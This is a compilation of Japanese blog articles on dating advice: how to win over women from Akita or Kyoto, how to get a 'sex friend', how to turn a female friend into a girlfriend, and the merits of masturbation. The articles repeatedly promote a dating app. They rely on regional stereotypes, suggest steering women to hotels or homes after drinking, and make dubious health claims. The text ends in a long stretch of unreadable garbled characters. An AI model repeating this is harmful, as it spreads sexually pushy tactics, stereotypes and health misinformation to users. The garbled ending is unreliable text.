秋田美人の彼女を作る方法5選

美人が多い県として知られている秋田、そんな秋田の女性に惹かれた経験はありませんか?

秋田の女性は色白でお洒落な方が多いと言います。

また、性格はおおらかな方が多く、陽気とも言われています。

男性、女性問わず美男美女が多い秋田県の女性と付き合うためにはどのようなことに気を付ける必要があるのでしょうか?

モテる男性の体験談や秋田県出身の女性の意見を参考に、秋田県の女性を彼女にできる方法5選をご紹介します!

是非参考にご利用ください。

ポジティブな考えをもつ



実は自殺率が高いとも言われている秋田県ですが、お人よしな性格ゆえに断れず抱え込んでしまう方が多いようです。

周りに迷惑をかけまいと明るく振る舞う方が多いですが、内側に抱え込んでしまいそういった結果を招いてしまうのかもしれません。

そんな秋田県の女性が惹かれる男性として、ポジティブな男性ということがあります。

一緒に楽しんでくれるような男性を好きになる女性が多いようです。

また、ポジティブな男性と付き合うことで自分も明るくなることができ、前向きになることができるということにも魅力を感じるようです。

さらに、男性女性に関わらず、秋田県の方は口数が少ない傾向にありますので、折れることなく声をかけるポジティブさも大切です。

ただ、あまりしつこくしてしまうと不快に思われてしまう場合もありますので、女性の表情をみて笑顔が引きつっていた場合等は嫌われない為にも空気を読んで行動することも大切です。

女性を引っ張る男性になる

さらに、秋田県の女性の特徴として、男性の一歩後ろをいくということがあります。

「支える」ということに喜びを感じる女性が多い都道府県でもあります。

その為、自分を引っ張ってくれるような男性に惹かれるという場合が多いようです。

女性に合わせる優しさも大切ですが、「ちょっとした強引さ」も大切です。

秋田県の女性に限らず、優柔不断な女性は多くいます。

なかなか決められない場合が多いですが、「どこに行きたい?」と質問をした際、「どこでもいいよ」や「任せる」と言われた時には「じゃあ、ここに行ってみよう!」などイライラすることなく提案をしていきましょう!

また、「ここに行ってみたいんだけどどうかな?」などデートプランを立てることもおススメです。

リードできる男性になることで、「頼りになる男性」というイメージになることができ、女性も安心することができます。

この女性を引っ張る男性になるということは秋田県の女性のみならず、他県の女性にも通用すると思いますので、ぜひ活用してみてください!

お酒の話で盛り上がる



あきたこまちやひとめぼれなどの有名なお米を生産している秋田県では日本酒も有名です。

その為、お酒好きな女性が多いという特徴もあります。

お酒に強い女性も多く、全国の酒豪ランキングでは1位になる県です。

そんな秋田県の女性との盛り上がるワードとしてお酒の話をしてみてはいかがでしょうか?

酒豪が多い県とも言われているけれど、結構飲むの?」と会話のきっかけになると思います!

もし「お酒好きでよく飲みに行く」と言われた場合には、「飲みに行こうよ!」や「(自分の方が)先に潰れちゃいそうだね」などと続けてみましょう。

この会話によってデートのお誘いもできそうですね!

万が一「周りは飲む人が多いけれどお酒はあまり飲まない」と言われた場合には「お酒弱い女性って可愛らしいよね!」などというと好感をもってくれると思います。

また、自分もあまり飲まない場合には「自分もあまり飲めなくて」といった会話につなげることで会話も盛り上がるかと思います!

酒豪が多い県といったキーワードがあることで、会話も振りやすいのではないかと思いますので、ぜひ最初の会話のきっかけとしてこちらのワードを利用してみてはいかがでしょうか?

NGワードに気を付ける



秋田県の女性、男性共にNGワードがあることをご存じでしょうか?

そのNGワードとは“仙台”“サボり”の2つのワードです。

秋田県の方々は少々見栄っ張りな部分があるようです。

ファッション等の部分を実際に見てみると日本で一番美容室が多い都道府県とも言われ、外見に気を使う女性が多くいます。

その為、ライバル視していると言われている“仙台”というワードに不快感を覚えてしまう女性もいるようです。

秋田、仙台共にいい部分がありますが、不快感を感じられてしまっては距離を縮めることが難しくなってしまいますので、秋田県出身の女性の前ではあまり仙台をほめ過ぎないことをおススメします。

また、秋田県は真面目な方が多くいます。

その為、“サボり”というワードに敏感な可能性があります。

昔の話だったとしても、「不真面目な人なのかな」などと思われてしまうと距離ができてしまう可能性もありますので、そういった話は避けることをおススメします!

秋田県の女性とお付き合いする際はこのNGワードに気を付けて会話をするように注意しましょう!

万が一言ってしまって空気が悪くなってしまった場合は早めにフォローしましょうね。

そもそも秋田の女性の知り合いがいない!

すでに秋田の女性と知り合いで狙っているという方はぜひご紹介した方法を試してみてください!

ただ、秋田県以外に住んでいて、周りに秋田の女性がいないという場合も多いかと思います。

そんな秋田県の女性と付き合いたいけれど知り合いがいないという方におススメなサイトがハッピーメールです。

日本最大のマッチングアプリで、登録は無料で行えます。

最初はサービスポイントをもらうことができ、登録なしでもお試し検索を利用することができます

不安という方もサイトを除くだけでしたら、安心して閲覧することができるのではと思います。

秋田県の女性と出会いたいという方はぜひ利用してみてはいかがでしょうか?

退会も簡単にできますので、まずはお試しで利用してみることをおススメします!

まとめ

秋田美人の彼女を作る方法5選をご紹介しました。

秋田県の女性以外にも応用がきく方法かと思いますので、彼女をゲットしたいと考えている方はぜひ実践してみてはいかがでしょうか?

日本国内の中でも美人が多いと言われている秋田県の女性と付き合うためにも上記の方法をぜひ試してみてください!

ぜひ素敵な出会いをし、自慢の彼女をゲットしてくださいね!

【方言たまらん!】京美人の彼女を作る方法5選

タレントにも多くいる京美人、そんな女性とお付き合いしたいと考えたことはありませんか?

舞妓をはじめとする柔らかな口調のんびりした口調に惹かれた経験がある方もいると思います。

また、京都の女性は気遣いができるともいいます。

思っていることを隠すという「本音と建て前」の習慣により腹黒いと言われてしまうこともありますが、やはり、魅力的な女性が多いというのが現実です。

そんな京美人の彼女を作る方法5選をご紹介します!

ぜひ、参考にご利用ください!

大人な男性を目指す



京都の女性は理想が高く、大人な恋愛を好むと言われています。

高スペックな男性に惹かれるという特徴もありますが、仕事ができたり、高学歴といった男性を求める傾向にあります。

余裕のある男性が理想だという女性が多くいますので、恋愛において依存しすぎてしまうと嫌われてしまうようです。

連絡が来ないからと催促をしてしまったり、何をしているのかと気になるあまり連絡を度々してしまうといった行動は京都女性を遠ざけてしまいます。

また、二人で食事に行く際は、レディーファーストを心がけ、大人な男性を演出するようにしてくださいね!

女性への気遣いを大切にする

京都の女性は気遣い上手な方が多くいます。

そんな女性とお付き合いをする時には自分も気遣いを大切にしましょう。

女性の意図することを読み取るような男性に惹かれる傾向がありますので、先読みして動くように努力しましょう!

なかなか女性の意図することを読み取ることは難しいかと思いますが、「荷物持とうか?」と声をかける、車道側を歩く、椅子に座る時に椅子を引いてあげる、エレベーターの扉を抑えるといった行動なら実践できるのではないかと思います。

また、女性がヒールの靴を履いている場合には適度に休憩を挟むといった気遣いもいいかと思います。

自然と気遣いができる女性が多いからこそ、女性の気遣いを当たり前だと思わず男性も気遣いを大切にする必要があるようです!

また、気遣いの一つとしてしっかり感謝を伝えるという方法もあります。

女性に何かしてもらった時に「ありがとう」としっかり言葉にして伝えましょう。

女性の行動を小まめに見ておくことで少しずつ気遣いのタイミングをつかむことができると思います。

デートの際や連絡を取っている時は女性の行動・言動に気を付けて自分の行動や言動を見直すようにしてくださいね!

品のある行動を心がける



京都の女性は付き合って自分を高めてくれるような男性に惹かれるという特徴もあります。

また、古き良き日本を大切にする県民性がありますので、言葉遣いや食事の仕方にも気を付けるようにしましょう。

言葉遣いや食事の仕方といった部分は、普段から気を付けていないといざという時にぼろが出てしまう可能性があります。

若者言葉を多用するような男性は恋愛対象外となってしまう可能性があります。

言葉遣いはビジネスマナーの部分でも活用することができますので、普段から気を付けることをおススメします。

さらに、食べ方も気を付ける必要があるようです。

口にものが入っている時に喋る、食べ物を噛む時に口を開けて音を立てるといったことは京都の女性に限らず、不快感を与えてしまいます。

和洋中それぞれの食事マナーがありますので、インターネットで調べて実践していくことをおススメします。

最初は慣れない為、食べにくいと感じてしまうかもしれませんが、毎日の食事の時間に気を付けることで習慣づけることができ、いざという時にしっかり実践することができると思います!

言葉遣いや食事のマナーといった部分は日頃の習慣として直すことができ、京都の女性の前は勿論、他の都道府県の女性の前や仕事の場面でも生かすことができますので、すぐにでも実践していくことをおススメします。

NGワードに気を付ける



京都の女性と付き合う際、NGワードが2つあります。

その一つ目は“関西”です。

特に大阪とまとめられることを嫌う女性も多いようです。

大阪も京都も魅力的で、関西弁というように方言も似ているのですが、京都の方言はゆったりとした話し方が印象的です。

大阪はテンポよく話す印象がありますね。

京都の方からすると大阪の方の話し方はがさつな印象となってしまうようです。

その為、大阪とまとめられることを嫌う傾向にあるようですので、あまり大阪の話題は出さないことをおススメします。

もう一つのNGワードは“東京”です。

日本の首都は東京ですが、都として栄えた京都は日本の首都は京都だという印象を持っているようです。

また、日本古来の文化を残す京都では外国人の観光客が多いということも関係しているのではないでしょうか?

折角仲良くなりたいと思っている女性に悪印象を与えないためにも、京都の方とお話しをする際は、NGワードであるこの2つに気を付けることをおススメします!

そもそも京美人な知り合いがいない

京都以外の都道府県に住んでいる、近くに京美人な知り合いがいないと悩んでいませんか?

そんな方におススメなサイトがハッピーメールです。

日本最大級のマッチングサイトとなっていて、登録者数が多いという利点があります。

実際に京都出身の方も多く登録していて、効率よく京美人な女性と知り合うことができます。

登録をするだけでポイントをもらうことができ、すぐに連絡を取ることができるという利点もあります。

登録する前にお試し検索という機能を利用することもできますので、一度サイトをご覧になってはいかがでしょうか?

優良サイトで、実際に多くの方々がカップルとなることができています!

コンシェルジュが24時間365日メールや電話対応をしてくれるので、疑問点をすぐに聞くことができるのも嬉しいですね。

退会も簡単にすることができますので、京美人な女性と知り合いたいという方はぜひ利用することをおススメします!

まとめ

京美人な彼女を作る方法5選をご紹介しました。

京都の女性は大人な男性を求め、気遣いのできる男性に惹かれる、品のある男性に惹かれるというポイントがありますので、京美人な彼女が欲しいとお考えの方はぜひ心がけてみてはいかがでしょうか?

また、仲良くなる際、NGワードには注意するようにしましょう!

素敵な京美人の彼女を作ってください!

【SEX好きな男性必見!】エッチフレンドの簡単な4つの作り方

エッチフレンドと、セフレは似たような意味として使われていますが、どちらにせよ、友人と恋人の狭間にあるような関係なので、一見難しいようにも思えますが、やり方によっては誰であってもエッチフレンドを作ることは可能なのです。

男性に求められるのは、女性の先頭となって自らが進んで誘うような言葉巧みな口実です。

今回は誰でも出来るエッチフレンドの簡単な作り方について紹介したいと思います。

アプリやサイトを使ったやり方

出会い系を利用する



現在流通となっている「出会い系」を主体とした出会い系アプリやサイトは、年頃の年代となれば一度は聞いたことがあると思いますが、これらを利用することで、エッチが大好きな女性を簡単に見つけることができ、エッチフレンドを作ることが可能になります。

そのためにはまず、女性と出会うことが最低条件であり初めのステップなのです。

そこで、無料の出会い系と有料の出会い系がありますが、出会うことが出来た男性と、出会い系を利用しても満足に出会えなかったという男性も当然居るなかで、有料の出会い系であれば、必ず出会いがあると言われています。

無料の出会い系と、有料の出会い系は何が違うのかと思う男性も多いかと思いますが、まず男性の会員人数が全く違ってきます。

ほとんどの出会い系が男性を有料にしているので、無料の方へ男性会員が集まるのは当然なのですが、男性会員が増えるからといって、女性会員が増えることはありません。

そのため、男性会員のみが増えていく一方なので、男性同士の競争率が上がってしまいます。

圧倒的に多い男性会員が、数少ない女性会員に群がるのと同じことが起こってしまうので、出会えずに断念してしまう男性が出てきてしまいます。

また、無料の出会い系の場合、通報することが出来ても、悪質なユーザー会員が女性会員へ攻撃することも多いために、女性会員の居心地の悪さは増すばかりですが、有料の出会い系の場合、サポート体制やパトロールといった姿勢が見られるので、女性会員からの安心や信頼が厚い分、女性会員が集まる理由でもあるのです。

したがって、女性と出会うことが前提となってはしまいますが、出会い系はエッチに興味のある女性が集まる場所でもあるので、出会ってしまえばエッチフレンドへと持ち込むことは決して難しくはありません。

無料の出会い系であっても充分出会える可能性はありますが、より確実性を求めるのなら、有料の出会い系を利用してみるのもいいかもしれません。

有料の出会い系であれば、女性の数が多いのはもちろん、自分に合った女性を選ぶ選択肢を増やすことも出来るので、女性側のプロフィールなどを頼りに、性欲の強い女性をピックアップするといいでしょう。

エッチフレンドを作るときの女性の人選として、もっとも重視するべきなのは、性欲が強いこと、ビッチであることの二つです。

性欲が強くビッチであるのなら、同じようにエッチフレンドを求めて出会い系を利用している可能性が高く、そのまま肉体関係へと登り詰めることが出来るかもしれません。

SNSを活用

ミクシィ、ツイッター、インスタグラムといったコミュニケーションを主体としたSNSがありますが、DMやリプライ、タグといった機能があるため、出会い系と似た形で利用している方も多くなってきているのが現状です。

これを利用してエッチフレンドを作るにはどうしたらいいのかと考えたとき、最も効率がよく、簡単なのがタグを使うことです。

タグとは「ハッシュタグ」の略称であり、同じハッシュタグをつけられた投稿を検索することで、その投稿をまとめて見ることが出来る機能です。

例えば、「#○○募集」というハッシュタグで検索をかけることで、○○募集についての投稿をまとめて見ることができる、といった使用です。

「#エッチフレンド募集」「#セフレ募集」といったハッシュタグをつけて投稿することで、同じ目的を持ったユーザーと出会うことができます。

しかし、知り合ってすぐに会う行為は、たとえエッチフレンドになれたとしても、それを継続することが出来ない場合があるのでおすすめはできません。

また、お互いが初対面なために、お互いを理解する時間もなく、出会ってもエッチな雰囲気へと持ち込むことができずに一日が終わってしまう、といったこともあります。

したがって、まずはどのような性癖があり、どのくらいエッチが好きなのかなど、相手とある程度仲良くなる必要があるのです。

口実を使った現実でのやり方

女性を誘い込む



やや強引な方法にもなってしまいますが、飲み会や合コンを利用して、そのままホテルや自宅へと誘い込むことで、肉体関係を築く流れを作ることができ、エッチフレンドになるということは少なくありません。

むしろ、エッチフレンドという関係を持つ男女に多いのは上記の内容が多いと言えるでしょう。

重要なのはいかに女性をホテルや自宅に誘うことが出来るか、つまり男性側がどれほど上手くクールに女性を誘うための口実を作れるかが鍵となります。

料理をご馳走したいから家に来ない?」や「ここのホテルに泊まってみない?」といったさりげない誘いでも、誘われた女性は自然とエッチな予感を感じとるはずです。

そこから断られることなく了承されたときは、エッチフレンドになるチャンスと言ってもいいでしょう。

しかし、注意しなければいけないのは、誘いが成功するのはある程度相手の女性と顔見知りであることと、仲がよいことが上げられるので、まだ会って間もない間柄の場合、突然「俺とエッチフレンドになってほしい」と言われても引かれてしまうか、困惑されてしまう可能性が高いと思います。

したがって、一般的に使われている「仲の良い」関係になるまでは様子を見た方がいいかもしれません。

女友達から選ぶ

エッチフレンドは、恋愛感情からではなく、お互いが肉体関係の快感のみでエッチをすることが出来る「友達」といった関係のことを言いますが、女友達からエッチフレンドになることは恥ずかしいと感じる男性も多いように感じます。

しかし、その考え方を捨てることで、より簡単にエッチフレンドを作ることが出来るのです。

比較的に、ある程度互いの仲が良くなければエッチフレンドになれる確率は高いとは言えませんが、元々友達からのスタートであるのなら、エッチフレンドになることは決して不可能ではないのです。

むしろ、女友達とエッチフレンドになることに成功すれば、一時的なもので終わってしまうことがなく、長続きさせることも期待できます。

したがって、友達であることが土台として出来上がった状態であるのなら、そのままエッチフレンドへと関係を引っ張ることは、初対面な女性を相手にするより簡単なことの場合があるのです。

まとめ

エッチフレンドはその場の流れでなることもありますが、比較的に男性の方からエッチフレンドを持ちかけることで出来上がるパターンが多いので、女性から持ちかけられるのを待つのではなく、男性側から持ち出すことが必要です。

また、エッチに興味のある女性であればあるほど、それが例え女友達であっても、エッチフレンドへとより簡単に、関係を進めることができるのです。

【彼女作り!】友達から恋人になる5つの方法教えます!

女友達を好きになってしまったという男性の中で、なかなか告白へと持ち込めずに悩んでいる方も、多いのではないでしょうか。

その多くは、告白してしまえば今の関係すら崩壊してしまうのではという気持ちからだと思いますが、行動しなければ、関係も一向に変わることはありません。

今回は友達から恋人になるための、より近い方法を紹介しようと思います。

友人と恋人の境目と関係



目に見えない一線だからこそ、境目が曖昧になりがちなのが友人と恋人の関係ですが、友達からのスタートのため、お互いを理解し合えていることや、仲の良さなど、メリットといえる部分が多数存在しているので、初対面からのスタートよりは遥かに有利だと思います。

しかし、女友達の方が友達は友達としか見ていない場合、異性として見てもらえることが少なくなってしまうので、恋人になるには、のんびり相手から告白してくるのを期待して待つのではなく、本人自らが順を追った行動をして、告白へと持ち込む他ありません。

また友達以上恋人未満という言葉を一度は耳にしたことがあると思いますが、これを好きな女友達から言われ、「俺は恋人には届かないのか」「どんなに頑張っても無理かもしれない」と諦めてしまうことはありません。

なぜなら「友達以上恋人未満」はあくまでも、今はという意味としても捉えることが出来るので、努力次第ではいくらでも変えることが出来るからです。

そのためには、好きになった女友達から、意識してもらうことが必要になってきます。

友達から恋人へ土台となるポイント

一緒に居る時間を増やす

友達という間柄があるので、遊びやドライブ、飲みに誘うことはそれほど難しいことではないと思います。

例えば「今度の○日空いてる?空いてたら一緒にドライブにでも行こうよ」といった軽い感じの誘いであっても、友人関係ということもあり、断られる確率は殆どないでしょう。

したがって、LINEやメールでのやり取り以外に、一緒に過ごす時間を増やすことにより、いつもと違った雰囲気をつくることが出来るので、物理的にも、心境的にも距離を縮めることが出来ます。

また、女性はいつも自分と一緒に居る人物を少なからず意識する心理が働くので、一度誘って終わるのではなく、会う回数を増やすことで二人きりの時間も自然と増えていきます。

しかし、これは当然ながら二人きりである必要があります。

なぜならグループなどの大人数になってしまうと、ふざけ合うような賑やかな環境が出来上がるため、恋愛といった雰囲気にはなかなか持ち込めなくなってしまうからです。

困っていたら助ける



悩んでいたり、困っていたり、人は弱ってしまっている時ほど、手を差し伸べて話を聞いてくれる優しい存在が、より一層魅力的に見えてしまいます。

それが一度や二度ではなく、「何かあった?」と察するような言葉で心配をしてあげることで、「この人はいつも助けてくれる」「私のことを一番理解してくれてる」と女性側は心を開き、頼れる存在と認識するため、何でも話してくれるようになります。

また、「お前だけだよ」という特別感を出すことで、相手にとってなくてはならないもの、つまり必要不可欠な存在になることもでき、友人としか見られていなかったのが、恋愛対象として意識させることが出来ます。

したがって、必要なのは適当な対応ではなく、表面だけ優しいような見せかけでもなく、元気のない様子や困っている様子な時だからこそ、親身に聞こうとする姿勢を見せることなのです。

友達から恋人へ意識の向上テクニック

恋愛話を振ってみる

恋人にしたい女友達の好みな男性のタイプを聞き出す上でも、自分の好きな女性のタイプを口にする上でも、恋愛話を振ることは重要な鍵だといえます。

まず恋人にしたい女友達から、好みの男性のタイプを聞く行為は、すなわち今の関係から、恋人に持ち込めるかどうかの可能性を認識するためのものでもあるので、目安として聞いておくと良いと思います。

次に自分の好きな女性のタイプを口にする行為は、「それって、なんだか私に当てはまっているような」と思わせるような好きな女性のタイプをさりげなく口にすることで、例え「考えすぎかな」と思われてしまっても、気になる気持ちから無意識に考えてしまう心理が自然と働きます。

友人から異性として見るキッカケにすることも出来るので、機会を伺いながら、思いきって恋愛話を振るといいでしょう。

意識させる言葉を口にする



友達で固定されてしまっていた男性から、突然告白を受けてしまえば驚愕してしまうのは当然です。

女性側を深く悩ませたり、困らせてしまうこともあるため、「友達ですらいられなくなってしまうかもしれない」という恐怖は少なからず男性にもあると思いますが、ちょっとした好意を伝えることは、むしろプラスに働くことが多いのです。

それは機会を伺う意味でも、うっすらと好意を伝えることで、確実に意識させることが出来ます。

例えば今まで友達だと思っていた男性から、「お前が恋人だったら楽しいだろうな」と言われてしまえば、「私に気があるってこと?」と半信半疑な気持ちになるので、気にならずにはいられないはずです。

したがって、真っ正面から攻めるのではなく、思わせぶりな言動を少しばかり会話に混じらせることで、友人という関係から一変、恋愛対象として意識させることができる上に、相手の反応や様子を伺うことができます。

いつもとは違った一面を見せる

女性はギャップというのに惹かれる傾向があり、自分の知らなかった男性の一面にトキメクことがあるので、いつもとは違った自分を魅せてみるといいでしょう。

例えば食事に誘った時、いつもは着なかった服を着てみたり、優しい対応をしてみたりなど、意外だと思わせるような一面を出すことで、「こんなに格好良かったっけ?」や「私も知らなかった一面があったんだな」と思わせることができます。

イメージチェンジやギャップなどは、自身をプラスに変えてくれることがあるので、試してみるといいかもしれません。

まとめ

友達関係だった相手に恋をしてしまうことも、友達から恋人になることも、決して珍しいことではなく、男女関係なく起こりえることなのです。

友人関係という土台が出来上がっている分、恋人に持ち込むことは誰であろうと可能性はゼロではないので、自分に自信を持ち、恋人にしたい女友達を他よりも理解して、支えようとする意志が大切です。

【知ってる!?】オナニーのメリット、デメリット

皆さんはオナニーしてますか?

皆さんがするオナニーなんですが、メリット、デメリットがあるんです。

オナニーってデメリット多そう…。
と思っていらっしゃる方も多いでしょうが、実際のところははそんなこともないんです!

皆さんもこの記事を読んで、正しいオナニーライフを満喫しましょう!

【オナニーのメリット】

セックスのトレーニングになる


男女ともオナニーをすることは、セックスのトレーニングになります。
自分が理想とする相手や体位、シチュエーションを想像しながらのオナニーは、実際にセックスをするときにとても役に立ってきます。

ポイントは想像してオナニーをするということ。理想としてはオカズを妄想力に任せるということです。

しかし、今の世の中は便利なもので、ネット検索でエロ動画と検索すればたくさんのアダルト動画が出てくる便利な時代です。
そんな時代の便利化によりオナニーの質はどんどん下がっています!
エロ動画に頼らずに妄想力でオナニーが出来るようになると、実際のセックスのときに効果が発揮できると思います。

勃起力を高める効果がある

本番のとき、いざ挿入しようと思ったら息子が言うことを聞いてくれない、そんな状況男としては辛いですよね。

それは陰茎の筋力低下が原因、つまりチントレを行っていくことが大切です。
そのチントレというのが、オナニーなのです。

下の方の筋トレは無理だと思っている方も多いでしょうが、もちろん鍛えることは出来ます。

日々のオナニーが勃起力の強化に繋がるのです。

早漏防止になる


オナニーをすることによって、早くイッてしまうという状況を変えることが出来ます。

そのためには毎日のオナニー15分以上かけて行うことが大切です。
気持ちいいからといって、2〜3分で終わるオナニーを行っていては意味がありません。

じっくりと時間をかけてオナニーをすることが大切です。
早漏が治れば、相手も自分も嬉しいものです。

ストレス解消になる

オナニーをすると気持ちいいですよね?
実はオナニーという行動自体がストレスを軽減する効果があるのです。
オナニーをすると大量のアドレナリンが分出され、脳内の興奮状態はMAXになります。
皆さんもストレスが溜まったら、すぐにシコシコして大丈夫です。

女性のオナニーは性感帯を強くし、感じやすくイキやすい体にする


女性でSEXを気持ちよくないと感じている人は多いようで、男性の勝手な愛撫や挿入が、そう感じる原因のひとつです。

そこで、女性は1人でオナニーをすることにより、自分の性感帯を刺激し、気持ちいい場所を開発することが出来るのです。

自分でオナニーを行い、それをパートナーに伝えることで今までより深く、質のいいセックスが期待できます。

女性ホルモンの活発化により、より女らしい身体になる

女性はオナニーをすることで女性ホルモンが活発になります。
よって若々しく、綺麗な肌を手に入れることができます。
また、月経などによる精神状態の安定化も挑めます。

オナニーをすることで、意識する異性を惹き付けられる効果が期待できそうです。

【オナニーのデメリット】

疲労が溜まる


オナニーをすることで、リラックス効果やストレス解消と引き換えに疲労が蓄積していきます。

オナニーをした次の日の朝に身体がだるい…
なんて経験をした方も多いと思います。

オナニーは思っているほか、体力を消耗してしまうのです。

間違ったオナニーをすることで、セックスの際にイカなくなる

これは男女ともに共通して言えることですが、間違ったオナニーをすると、イキにくい体質になってしまうのです。

男性であれば、オナホールなどの自慰行為用玩具の使いすぎや、床オナ(床に陰茎を擦り付けて行う自慰行為)などにより、膣内射精障害を引き起こしてしまう可能性があります。
また、手を清潔にしていなかったために、ばい菌に感染し、尿道炎などの病気を引き起こす可能性があります。

女性であれば、バイブやローターなどの玩具の使いすぎにより、逆にイキにくい身体になってしまいます。
また、女性も男性と同じく清潔にしていないと膣内炎を起こす可能性があります。

男性ホルモンが活発化され、ニキビや肌荒れの原因となる


男性はオナニーをすることによって、男性ホルモンの働きが高まり、ニキビや肌荒れになりやすくなります。

精液のほとんどはタンパク質で出来ています。
オナニーを行う際は、しっかりとタンパク質を補給してから行ったほうがいいかもしれません。

【番外編】

オナ禁をするとモテる!?


皆さんはオナ禁をするとモテると言うことを聞いたことはありませんか?
男性の方であれば、1度は聞いたことがあると思います。

本当にオナ禁をするとモテるのでしょうか?
オナニーをするとテストステロンという男性ホルモンが抑制されます。
このテストステロンというホルモンは、いわゆるモテる男性ホルモンであり、それが軽減すると言われています。
結果、モテなくなるとされていますが、果たしてどうなのでしょうか?

実は科学的根拠がないのです。
あなたの周りのモテる人はオナニーをしていないのでしょうか?
いいえ、必ずしているはずです。
よって、モテるモテないにあまりオナニーは関係ないと言われています。
むしろ、思春期の男子であればオナニーを行うこと自体が健全な行為なのです。

また、オナ禁によってスポーツの成績が上がるというのもデタラメな嘘です。
スポーツの成績はオナニーなんかよりも、日々の努力と負けない気持ちに比例します。

【まとめ】

皆さんが思っている以上にオナニーはメリットが多いのです。
自分で悪いイメージを持ち、オナニーをしないことでストレスを溜めるよりも、たくさんシコシコして発散してみましょう。
ただし、間違ったオナニーをしてはいけません。
知識をしっかりと身につけ、正しくオナニーを楽しみましょう。

ai??i??a??a??SEXa?i??ai??i??a??a??a?i???i??i??ai??i??ai???a?i??a??a?i??ai???a?i??a??ai??i??a??a?i??i??a?i??a?i??a?i??a??

ci??i??a??ai??i??a?i??a?i??a?i??a?i??a?i??a?i??ai??i??ai???ai???ai??i??a??a??ai??i??a??ai???ai???ai??i??a?i??a?Ya?i??ai???ai??i???i???a?i???i??i??a??a?i??ai??i??a??a?sa?i??a?i??ai??i??

a?i??ai??i??ai???ai??i??a??a??ai??i??a??ai???ai???a?i??ai??i??a??a??a??ai???a??a?i??a??a?Ya??a?i??a?i??ai??i??ai???a??a??a?i??a??a??a?i??a??a?i??ci??Ya?i??a?i??a?i??a?i??a??a?i??e?i??a??a?i??a?i??ai?????i??ei???a?i??a??a?i??e?i??a?i??a?i??a?i??a?Ya?i??ai??i??a?i??a?i??a?i??ai??i??

ai??i??a??a??ai??i??a??ai???ai???a?i??ai??i??a??a??ai???ci??i???i??i??a???i??i??ai??i??a?i??a?i??ai??i??a??a??a?i??a??ai??i??a??a??ai???a?i??a??a??a?i??a?Yai??i??

a??a??ai???ai??i??a??a??ai??i??a??ai???ai???ai??i??a?i??ai??i??a??a??a?i??a?i??ei???a?i??a?i??a?i??a??a?i??a?i??a?i??i??

??i????i??a?i??a?i??ai??i??



ai??i??a??a?i??a??a??a?i??a??a??ai???a?i??a?i??ai??i??a??ai???ai???a??a?i??a?i??ai???ai???a???i???a?i??ai???a?i??a?i??a?i??a??a?i??a?Yai???a?i??ai??i??ai???a????i??a??a?i??a?i??ai??i??ai??i??a?i??a?i??a??a??a??ai???a?i??a??a?i??ai??Sa?i??ai??i????i????i??a?i??a?i??a?i??ai???ai??i??a??ai???ai???ai??i??a?i??a??a?i??ai??i??a?i??ai??i??

ci???c??a?i??ai???ai??i??ai???ai??i??ai???e?i????i??ai??i???S?a??ai???ai??i??a??a??a?i??a??ai??i??a?i??ai??i??ai???a?Se??ai??i??a?i??ai???ai??i??a?i??ai??i??a??a??a??ai??i???i???a??ai??i??a??a?i??ai???ci??i???i??i??a??a?i??ai??i??ci???e?i??a?i??a?i??a?i??a?Sa??a??a?i??ai??i??a?i??ai??i??

a?i??a??ai???a??ai???a?i??a??a?i??a?i??a??a?i??a?i??a??c??ai??i???i???a??a?i??a?Sa??a?i??a??a?i??ai????i???a??a?i??a?Sa?i??a??a?i??a??ai???a??a??a?i??ei???ai??i??a??ei??i??ai???ai???ai???ai???a?i??ei??i??ai???a?Ya??a??a?i??ai??i??a?i??a?i??a?i??a?i??a??a?i??a?i??a?i??ai???a?i??a??a?i??ai??Sa??a?S?i??i??ai???ai???ai??i??a?i??a?i??a?Sa?i??a?i??a??a?i??a?i??a?i??ai??i??

a??ai???a??ai???ai??i??a??a??a?sa?i??ai???a?i??ei??i??a??a?Ya?i??a??ai??i??a??a?i??a?i??a?i??ai???a?sa?i??ai???ai??i????i??a??a?i??ai??i??ai??i??a?i??a?i??a??ei???a?i??a?i??a?i??ai??i??a?i??ai???a??a?i??a?i??a?i??ai???a?sa?i??ai???a??ci??i???i??i??a??ei???a?i??a?i??a?i??ai??i??a?i??a??ai?????i??a??a?i??a?Sa?i??a?i??a?Sa??a??a?i??ai??i??a?i??ai??i??

e??a??a?sa??a?i??a?i?????ai??Se??a??a?i??ai???ai??i??a??ai??i???Si??a??a??ai??i??a?i??a?i??a??ai??i??a?i??ai??i??a?i??ai??i??a?i??ai???a??a?i??ai??i??a??ai???a??a?i??a??a??a?i??ai??i??a?i??a?i??ai???a?i??a?i??ai???a??a?i????i????i??a?i??a?i??ai??i??a?i??a??a?i???i???ei???a?i??a?i??a??a?i??a?i??a?i??ai??i??

a??a??a?i??e??ai??i??a?i??ai???ai??i??

ai??i??a??a??a??ai???a?i??a?i???i??i??a??ai???ai??i??a?i??a?i??a?i??a??ci??Sa?i??a?i??a?i??a?i??ai??i??a?i??a?i??ai???a??a?i??ci??Sa?i??ai??i??a?i??a??a?i??a?i??ai??i??ci??i???i??i??a?i??a??ci??i??ai??i??

ci???a?i??ai???ai??i??a??a?i??a??a??a?i??a??ai???a??ai???a?i??ei???ai??i??ci??i???i??i??a?i??e??a??a?i??a??a?Ya?i??ai??i??a?i??ai???a??a?i??ai??i??a?i??ai???ci??i???i??i??a?i??e??ai??i??ei??i??ai??i??ai???ai??i??a?i??a??a??ai???a?i??a?i??a??e???i??i??a??ei???a?i??a?i??a?i??ai???a??a?se??a?i???i???ai???ai??i??a?i??ei???a??a?i??ai??Sa??a?i??ai??i??

a??a?i??a?Yai???a?i??ai???a?i??a??a?i??ai??i??ai??i??a?sa?i??ai?????i??a??a??a??a??a?i??e??a?i??a??ai??Sai???a?Se??ai??i??a?i??ai???a??a?i??a??a??a??e??a?i???i???ai???ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

a?i??ai??i??ai???a?Se??ai??i??a?i??ai???a?i??ai??i??a??a?i??a??a??a?i??a??ai???ai???ci??i???i??i??a?i??ai???a?i??a?i??c?i??ai??i??ei??i??a?i??a?i??ai???e??ai??i??ai???ai???ai???ai??i??ei??i??a?i??ai??i??ai???a??a?i??a?i??ai??i??a??a??a??a??a?i??ai??Sa??a?i??ai??i??

ai??i??a?i??ai???a??a??a??a?i??c?i??a?i??a??a??a?i??ai???a??ai???ai??i??ei??i??a??a?i??ai??i??e?Se?i??a?i??a?i??a?i??a?Yai??i??ai???ci??i???i??i??a??ai???a?i??ai???e??a?i??a??a??a?i??ai???ai???ai??i??ai???a??ai??i??a?i??ei??i??a??a?i??ai??i??ai???a?i??a?i??a?i??a??a?i??ai??i??a?i??ai??i??

